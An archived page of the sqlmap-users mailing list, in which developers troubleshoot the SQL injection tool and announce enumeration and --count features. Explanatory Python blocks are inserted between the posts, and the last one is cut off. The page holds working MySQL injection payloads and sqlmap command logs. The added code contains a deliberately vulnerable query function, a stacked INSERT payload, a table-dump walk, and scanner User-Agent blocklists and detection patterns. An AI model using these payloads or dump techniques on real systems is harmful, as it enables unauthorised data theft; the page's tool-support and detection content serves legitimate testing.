sqlmap-users Mailing List for sqlmap (Page 96)
Brought to you by: inquisb
From: Miroslav S. <mir...@gm...> - 2011-05-03 10:06:09

hi all.

with the last commit r3829 you'll be warned (in testing connection phase) about this kind of thing with something like:

[10:18:16] [INFO] testing connection to the target url
[10:18:46] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:18:46] [WARNING] if the problem persists please try to rerun with the --random-agent switch turned on
[10:19:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:19:48] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

kr

On Tue, May 3, 2011 at 10:10 AM, Miroslav Stampar <mir...@gm...> wrote:
> hi all.
>
> if you are encountering symptoms like this:
>
> [10:01:17] [INFO] testing connection to the target url
> [10:01:47] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [10:02:18] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> ...
>
> - while you are able to connect to the target url via browser, please use --random-agent to get it solved
>
> thing is that probably either sqlmap is blacklisted by some IDSes around or the web server itself just refuses requests with "uncommon" user agents (to prevent spidering and stuff).
>
> conclusion, use --random-agent in those strange "connection timed out" cases.
>
> kr
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Tom T. <k1...@li...> - 2011-05-03 09:14:12

Excellent! Confirmed fixed :)

> Date: Sun, 1 May 2011 17:45:19 +0200
> Subject: Re: [sqlmap-users] 32 results from database with 10,000 rows! (id 90-99, 990-999, 9990-9999)
> From: mir...@gm...
> To: k1...@li...
> CC: sql...@li...
>
> hi all.
>
> it's strange that nobody has noticed this till now :)))
>
> this bug was (in cases when the pivot column used was an integer based) trimming/preventing dumping of entire table contents of some DBMSes supported by sqlmap, like MSSQL, Sybase and MaxDB :)
>
> thank you Tom very much for this report. thing is that we haven't noticed it till this report because we use fairly small testing tables.
>
> now it should be fixed with the last commit
>
> kr
>
> On Mon, Apr 25, 2011 at 11:08 AM, Miroslav Stampar <mir...@gm...> wrote:
> > Hi Tom.
> >
> > I believe I see the connection with our code. Those number ranges have their root in the program's logic.
> >
> > Will be fixed in a week.
> >
> > After that hackers will be able to dump all :)
> >
> > It's just strange that nobody has noticed this in some two weeks as that's the time of affecting commit.
> >
> > Kr
> > On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote:
> >> When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why.
> >> Can anyone explain this behaviour?
> >> Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retrieve the rest of the data...
> >> Test subject is an MSSQL 2005 Database running on Windows 2003.
> >
> > --
> > Miroslav Stampar
> >
> > E-mail: miroslav.stampar (at) gmail.com
> > PGP Key ID: 0xB5397B1B
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
From: Tom T. <k1...@li...> - 2011-05-03 09:13:01

I'm not getting any files in the 'dump' folder. Also, using --replicate produces the following error:

[CRITICAL] unhandled exception in sqlmap/1.0-dev (r3828), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3828)
Python version: 2.6.6
Operating system: posix
Command line: sqlmap.py --url=***************************************************** --risk=3 --level=5 --forms --dbms=mssql --text-only --threads=3 --dump -D ******* -T ***************** --replicate -v 3
Technique: UNION
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 83, in main
    start()
  File "/home/tom/Downloads/sqlmap-dev/lib/controller/controller.py", line 485, in start
    action()
  File "/home/tom/Downloads/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
  File "/home/tom/Downloads/sqlmap-dev/lib/core/dump.py", line 373, in dbTableValues
    rtable = replication.createTable(table, cols)
  File "/home/tom/Downloads/sqlmap-dev/lib/core/replication.py", line 97, in createTable
    return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)
  File "/home/tom/Downloads/sqlmap-dev/lib/core/replication.py", line 59, in __init__
    self.parent.cursor.execute('CREATE TABLE %s (%s)' % (self.name, ','.join('%s %s' % (colname, coltype) for colname, coltype in self.columns)))
OperationalError: unknown database dbo
From: Miroslav S. <mir...@gm...> - 2011-05-03 08:10:40

hi all.

if you are encountering symptoms like this:

[10:01:17] [INFO] testing connection to the target url
[10:01:47] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:02:18] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
...

- while you are able to connect to the target url via browser, please use --random-agent to get it solved

thing is that probably either sqlmap is blacklisted by some IDSes around or the web server itself just refuses requests with "uncommon" user agents (to prevent spidering and stuff).

conclusion, use --random-agent in those strange "connection timed out" cases.

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
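The advice above separates two failure modes that look identical from the client side: the target (or proxy) really is unreachable, or a server-side or IDS rule is dropping requests whose User-Agent identifies a scanner. The following is an added example, not sqlmap's own code and not anything posted on the list: `fake_server` is a constructed stand-in for a target that silently drops scanner user agents, `diagnose` retries the same URL with a browser-style User-Agent to tell the two cases apart (which is the effect --random-agent has for real), and the log-parsing functions show the defender's side over constructed access-log lines, including why a User-Agent-only rule stops matching once the agent is rotated. The URL, the IP addresses, the rotated User-Agent string and the prefix blocklist are all assumptions.

```python
"""Telling a dead target apart from a User-Agent filter.

Added example, not sqlmap code. Everything below runs offline: `fake_server`
is a constructed stand-in for the remote side, and the log lines are made up.
"""
import re
from typing import Callable, List, Optional, Tuple

DEFAULT_TOOL_UA = "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"
# Hypothetical browser-style agent, standing in for what --random-agent would pick.
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"

# Constructed blocklist: prefixes a web server or IDS rule might refuse.
SCANNER_UA_PREFIXES = ("sqlmap", "nikto", "w3af", "python-urllib")

# A fetch callable returns an HTTP status, or None when the request times out.
Fetch = Callable[[str, str], Optional[int]]


def fake_server(url: str, user_agent: str) -> Optional[int]:
    """Stand-in target: drops scanner UAs on the floor, so the client only sees a timeout."""
    if user_agent.lower().startswith(SCANNER_UA_PREFIXES):
        return None
    return 200


def diagnose(fetch: Fetch, url: str, tool_ua: str = DEFAULT_TOOL_UA,
             browser_ua: str = BROWSER_UA) -> str:
    """Classify a 'connection timed out' as 'ok', 'ua-filtered' or 'unreachable'.

    Same URL, same path, only the User-Agent changes between the two probes, so a
    difference in outcome can only come from a UA-based rule somewhere in between.
    """
    if fetch(url, tool_ua) is not None:
        return "ok"
    if fetch(url, browser_ua) is not None:
        return "ua-filtered"      # rerun with --random-agent
    return "unreachable"          # target or proxy problem, not the UA


# --- the defender's view: the same distinction seen from the access log ---
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed combined-format lines: the first two carry the same payload,
# once with the default sqlmap UA and once with a rotated browser UA.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/May/2011:10:01:17 +0200] "GET /user.php?id=1%20AND%20SLEEP(5) HTTP/1.1" '
    '200 949 "-" "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"',
    '10.0.0.5 - - [03/May/2011:10:04:02 +0200] "GET /user.php?id=1%20AND%20SLEEP(5) HTTP/1.1" '
    '200 949 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"',
    '10.0.0.9 - - [03/May/2011:10:04:40 +0200] "GET /index.php HTTP/1.1" '
    '200 1201 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"',
]

# Request-side indicators (constructed, deliberately short): these survive a UA change.
PAYLOAD_RE = re.compile(r"(?i)(sleep\(|benchmark\(|%20and%20|%20or%20|union%20(all%20)?select)")


def flag_by_user_agent(lines: List[str]) -> List[Tuple[str, str]]:
    """What a UA-only blocklist catches: (ip, request) for scanner agents."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if m and m.group("ua").lower().startswith(SCANNER_UA_PREFIXES):
            hits.append((m.group("ip"), m.group("req")))
    return hits


def flag_by_payload(lines: List[str]) -> List[Tuple[str, str]]:
    """What a request-content rule catches: the rotated-UA line is still flagged."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if m and PAYLOAD_RE.search(m.group("req")):
            hits.append((m.group("ip"), m.group("req")))
    return hits


if __name__ == "__main__":
    print(diagnose(fake_server, "http://10.0.0.60/sql/user.php?id=1"))             # ua-filtered
    print(len(flag_by_user_agent(SAMPLE_LOG)), len(flag_by_payload(SAMPLE_LOG)))  # 1 2
```

Against a real target, `fetch` would wrap an HTTP client with the same timeout sqlmap uses; the point of keeping it injectable is that the decision logic is testable without a network. On the detection side, the UA rule catches one of the three constructed lines while the payload rule catches two, which is exactly the gap --random-agent exploits.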
From: Miroslav S. <mir...@gm...> - 2011-05-02 12:33:01

hi Mike.

thank you for your report and find it patched in the latest commit (svn update).

kr

On Mon, May 2, 2011 at 1:20 PM, Martin Mike <m.m...@ya...> wrote:
> unknown charset 'is0-8859-1'. Please report by e-mail to
> sql...@li...

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Martin M. <m.m...@ya...> - 2011-05-02 11:20:33

unknown charset 'is0-8859-1'. Please report by e-mail to sql...@li...
From: Miroslav S. <mir...@gm...> - 2011-05-01 21:11:45

hi Kirill.

for something like this stacked queries should be supported, while you can see from your injection info that there is no stacked injection vulnerability (as no command other than SELECT can be inserted into the vulnerable query).

kr

On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote:
> Hi,
> is it possible to make "insert/update" queries via sql injection bugs?
> I tried on my test machine via "--sql-query", but I didn't see the query in request_uri:
>
> (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
> $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';"
>
> sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 21:07:53
>
> [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file
> [21:07:53] [INFO] resuming injection data from session file
> [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [21:07:53] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=1 AND SLEEP(5)
> ---
>
> [21:07:53] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux CentOS 5
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5.0
> do you want to retrieve the SQL statement output? [Y/n/a]
> [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';'
> [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> insert into users set user='aaa',pass='bbb'; [2]:
> [*] None
>
> [21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60'
>
> [*] shutting down at: 21:07:54
>
> (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
> $ cat t3.log
> HTTP request [#1]:
> GET /sql/user.php?id=1 HTTP/1.1
> Accept-Encoding: identity
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 10.0.0.60
> Accept-language: en-us,en;q=0.5
> Pragma: no-cache
> Cache-control: no-cache,no-store
> User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> Connection: close
>
> HTTP response [#1] (200 OK):
> Content-length: 949
> X-powered-by: PHP/5.1.6
> Uri: http://10.0.0.60:80/sql/user.php?id=1
> Server: Apache/2.2.3 (CentOS)
> Connection: close
> Date: Tue, 26 Apr 2011 19:07:53 GMT
> Content-type: text/html; charset=UTF-8
>
> HTTP_ACCEPT_ENCODING => identity
> HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
> HTTP_CONNECTION => close
> HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
> HTTP_HOST => 10.0.0.60
> HTTP_PRAGMA => no-cache
> HTTP_CACHE_CONTROL => no-cache,no-store
> PATH => /sbin:/usr/sbin:/bin:/usr/bin
> SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address>
> SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
> SERVER_NAME => 10.0.0.60
> SERVER_ADDR => 10.0.0.60
> SERVER_PORT => 80
> REMOTE_ADDR => 10.0.0.60
> DOCUMENT_ROOT => /var/www/html
> SERVER_ADMIN => root@localhost
> SCRIPT_FILENAME => /var/www/html/sql/user.php
> REMOTE_PORT => 41083
> GATEWAY_INTERFACE => CGI/1.1
> SERVER_PROTOCOL => HTTP/1.1
> REQUEST_METHOD => GET
> QUERY_STRING => id=1
> REQUEST_URI => /sql/user.php?id=1
> SCRIPT_NAME => /sql/user.php
> PHP_SELF => /sql/user.php
> REQUEST_TIME => 1303844873
> ok
> ############################################################################
>
> --
> Kirill Morozov
> KIMO2-RIPE, RHCE

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Kirill M. <l0...@l0...> - 2011-05-01 19:34:50

Hi,
is it possible to make "insert/update" queries via sql injection bugs?
I tried on my test machine via "--sql-query", but I didn't see the query in request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';"

sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address>
SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok
############################################################################

--
Kirill Morozov
KIMO2-RIPE, RHCE
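The reply in this thread says DML through --sql-query needs a stacked-queries injection point, because an error-based or time-based payload lives inside the application's own SELECT and an INSERT cannot be nested there. The following added example (not sqlmap's code and not anything the list members posted) makes that concrete with an in-memory SQLite table: `vulnerable_lookup` is a constructed stand-in for the user.php?id= page, and its `stacked` flag models whether the application's database layer executes more than one statement per call. Table and column names are assumptions.

```python
"""Why --sql-query with INSERT/UPDATE needs a stacked-queries injection.

Added example, not sqlmap's code. `vulnerable_lookup` is a constructed stand-in
for the user.php?id= page from the thread; `stacked` models whether the
application's database layer runs more than one statement per call.
"""
import sqlite3
from typing import Any, Dict


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, user TEXT, pass TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 's3cret');"
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str, stacked: bool) -> Any:
    """String-concatenated query, deliberately vulnerable like the page in the thread."""
    sql = "SELECT user FROM users WHERE id = " + user_input      # injection point
    try:
        if stacked:
            conn.executescript(sql)    # runs every ';'-separated statement in the string
            return "executed"
        return conn.execute(sql).fetchall()   # single-statement API: a second ';' statement is refused
    except (sqlite3.Warning, sqlite3.ProgrammingError, sqlite3.OperationalError) as exc:
        return "error: " + str(exc)


def user_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def run_demo() -> Dict[str, Any]:
    conn = make_db()
    before = user_count(conn)

    # 1. A SELECT-only payload rides inside the page's SELECT: this is the shape of the
    #    error-based and time-based payloads in the thread, and it works for reading.
    select_only = vulnerable_lookup(conn, "1 AND (SELECT COUNT(*) FROM users) = 1", stacked=False)

    # 2. DML cannot be nested where a SELECT subquery goes: syntax error, nothing written.
    nested_dml = vulnerable_lookup(
        conn, "1 AND (INSERT INTO users(user, pass) VALUES ('aaa', 'bbb'))", stacked=False)

    # 3. The only way to run INSERT is to append a second statement, which works
    #    if and only if the database layer executes stacked statements.
    dml = "1; INSERT INTO users(user, pass) VALUES ('aaa', 'bbb')"
    single_stmt = vulnerable_lookup(conn, dml, stacked=False)
    stacked = vulnerable_lookup(conn, dml, stacked=True)

    return {
        "select_only": select_only,
        "nested_dml": nested_dml,
        "single_stmt": single_stmt,
        "stacked": stacked,
        "rows_added": user_count(conn) - before,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The same split applies to real drivers: PHP's `mysql_query()` of that era, which the quoted target runs, executes a single statement, so the injection found by sqlmap (error-based and time-based, inside a WHERE clause) can read data but has nowhere to put an INSERT. Only when sqlmap reports a "stacked queries" technique does --sql-query with DML have a path to execute.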
From: Miroslav S. <mir...@gm...> - 2011-05-01 15:45:26

hi all.

it's strange that nobody has noticed this till now :)))

this bug was (in cases when the pivot column used was an integer based) trimming/preventing dumping of entire table contents of some DBMSes supported by sqlmap, like MSSQL, Sybase and MaxDB :)

thank you Tom very much for this report. thing is that we haven't noticed it till this report because we use fairly small testing tables.

now it should be fixed with the last commit

kr

On Mon, Apr 25, 2011 at 11:08 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Tom.
>
> I believe I see the connection with our code. Those number ranges have their root in the program's logic.
>
> Will be fixed in a week.
>
> After that hackers will be able to dump all :)
>
> It's just strange that nobody has noticed this in some two weeks as that's the time of affecting commit.
>
> Kr
> On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote:
>> When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why.
>> Can anyone explain this behaviour?
>> Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retrieve the rest of the data...
>> Test subject is an MSSQL 2005 Database running on Windows 2003.
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 23:58:48

Hi,

During the last two days we have worked extensively on these three switches as well as needed adjustments to the brand new --schema switch (thanks David for suggesting it!) and --dbs.

The outcome is:

* Redesign of the plugins' methods that deal with these switches.
* Homogeneous code and behaviour across the different DBMS.
* More user-friendly logging messages.
* Standardized new functionalities.

The new functionalities consist in:

* --tables now properly accepts either no -D or a list of comma separated databases (e.g. --tables -D testdb1,testdb2) and --exclude-sysdbs is always considered.
* --columns:
  * You can provide no extra parameters (as in -D, -T, -C) leading to a call to --schema to enumerate the full DBMS schema (read, all databases' tables' columns).
  * You can provide -D only (one database name is allowed) and no extra parameters (as in -T, -C) leading to an enumeration of all tables' columns for the provided database.
  * You can provide -T only (comma separated tables are allowed) leading to retrieval of current database and subsequent enumeration of all columns for the provided table(s) on the current database.
  * You can provide -D (one database name is allowed) and -T (comma separated tables are allowed) leading to retrieval of all columns of the provided table(s) on the provided database.
  * You can provide -C only (comma separated columns are allowed) leading to retrieval of current database, enumeration of all tables in the current database and subsequent enumeration of all the columns "LIKE" the one(s) provided within the current database's tables.
  * You can provide -C (comma separated columns are allowed) and -T (comma separated tables are allowed) leading to retrieval of current database and subsequent enumeration of all the columns "LIKE" the one(s) provided within the provided tables in the current database.
  * You can provide -C (comma separated columns are allowed) and -D (one database name is allowed) leading to enumeration of all tables in the provided database and subsequent enumeration of all the columns "LIKE" the one(s) provided within all tables in the provided database.
  * You can provide -D, -T and -C to be very specific in which database's table(s) column(s) you want to enumerate.

In all cases, --exclude-sysdbs is supported (of course, when -T is not provided) and the relevant datatype for the enumerated columns is shown also.

I tested this new implementation thoroughly and it seems to work pretty well on my test environment, however I would be very grateful if you report any bug or unexpected behaviour, as usual.

Thank you,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Miroslav S. <mir...@gm...> - 2011-04-30 22:40:09

hi Andrew.

thank you for your report. find it fixed in the latest commit (r3804).

kr

On Fri, Apr 29, 2011 at 11:48 PM, Andrew Gecse <and...@up...> wrote:
> [23:46:20] [WARNING] unknown web page charset 'hungarian-iso-8859-2'.
> Please report by e-mail

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 13:28:38

You are running sqlmap with a version of Python below 2.6. sqlmap is supported on Python 2.6 and 2.7 at the moment.

Bernardo

On 30 April 2011 09:14, You know my name <64...@ma...> wrote:
> installed python, pulled sqlmap from svn, I run it and get an error
>
> -sh-3.2# ./sqlmap.py
>   File "./sqlmap.py", line 119
>     finally:
>           ^
> SyntaxError: invalid syntax
>
>
> -sh-3.2# python sqlmap.py
>   File "sqlmap.py", line 119
>     finally:
>           ^
> SyntaxError: invalid syntax

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: You k. my n. <64...@ma...> - 2011-04-30 08:14:58

installed python, pulled sqlmap from svn, I run it and get an error

-sh-3.2# ./sqlmap.py
  File "./sqlmap.py", line 119
    finally:
          ^
SyntaxError: invalid syntax

-sh-3.2# python sqlmap.py
  File "sqlmap.py", line 119
    finally:
          ^
SyntaxError: invalid syntax
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-30 00:25:09

Hi,

On 26 April 2011 04:00, David Guimaraes <sk...@gm...> wrote:
> How about a --count switch? To count the number of rows (like sqlsus do)...
> and what about column enumerator without setting some table(-T) or DB (-D)?

The --count switch has also been implemented. It works like this: count the number of entries for a specific table (when -T is provided - supports multiple tables, comma separated), all database's tables (when only -D is provided) or all databases' tables when neither -D nor -T are provided.

Thanks for sending these feature requests.

Cheers,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
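Two things on this page fit together: the thread above in which an integer pivot column left a 10,000-row MSSQL table dumped as 32 rows, and the --count switch announced in this message. The following added example is an illustration, not sqlmap's own code: for DBMSes without LIMIT/OFFSET a table is dumped by walking a pivot column (MIN(pivot) greater than the last value seen, then the other columns for that pivot value), one scalar per request as an inference-based injection would provide; `Dumper.query` is that hypothetical single-value oracle, backed by SQLite so the walk runs offline. The mechanism of the actual bug is not described in the thread and is not reproduced here; what the example adds is the check a practitioner wants after any dump, comparing the rows retrieved against COUNT(*). Table schema and row count are constructed.

```python
"""Pivot-column table dump plus a completeness check against COUNT(*).

Added illustration, not sqlmap's own code. `Dumper.query` is a hypothetical
single-value oracle (one scalar per request, as an inference-based injection
yields) backed here by SQLite so the walk runs offline. Schema and rows are
constructed.
"""
import sqlite3
from typing import Any, Dict, List, Optional, Sequence, Tuple


def build_table(conn: sqlite3.Connection, rows: int) -> None:
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     ((i, f"user{i}", f"user{i}@example.test") for i in range(1, rows + 1)))


class Dumper:
    def __init__(self, conn: sqlite3.Connection) -> None:
        self.conn = conn
        self.requests = 0            # how many oracle queries the dump cost

    def query(self, sql: str) -> Optional[Any]:
        """One scalar per call; None when the query yields no row or a NULL."""
        self.requests += 1
        row = self.conn.execute(sql).fetchone()
        return None if row is None else row[0]

    def count(self, table: str) -> int:
        return int(self.query(f"SELECT COUNT(*) FROM {table}"))

    def pivot_dump(self, table: str, pivot: str, columns: Sequence[str]) -> List[Dict[str, Any]]:
        """Walk `pivot` upward with MIN(pivot) > last, then read the other columns per value.

        This is the technique used where LIMIT/OFFSET is unavailable; it requires the
        pivot column to be unique and NOT NULL, otherwise rows are silently skipped.
        """
        rows: List[Dict[str, Any]] = []
        last: Optional[Any] = None
        while True:
            where = "" if last is None else f" WHERE {pivot} > {last!r}"
            nxt = self.query(f"SELECT MIN({pivot}) FROM {table}{where}")
            if nxt is None:
                break                # no value above `last`: the walk is complete
            row = {pivot: nxt}
            for col in columns:
                row[col] = self.query(f"SELECT {col} FROM {table} WHERE {pivot} = {nxt!r}")
            rows.append(row)
            last = nxt
        return rows


def dump_with_check(dumper: Dumper, table: str, pivot: str,
                    columns: Sequence[str]) -> Tuple[List[Dict[str, Any]], int, bool]:
    """Return (rows, expected_count, complete). A dump that stops early is caught here."""
    rows = dumper.pivot_dump(table, pivot, columns)
    expected = dumper.count(table)
    return rows, expected, len(rows) == expected


def demo(rows: int = 1500) -> Tuple[List[Dict[str, Any]], int, bool, int]:
    conn = sqlite3.connect(":memory:")
    build_table(conn, rows)
    dumper = Dumper(conn)
    dumped, expected, complete = dump_with_check(dumper, "users", "id", ["name", "email"])
    return dumped, expected, complete, dumper.requests


if __name__ == "__main__":
    dumped, expected, complete, requests = demo()
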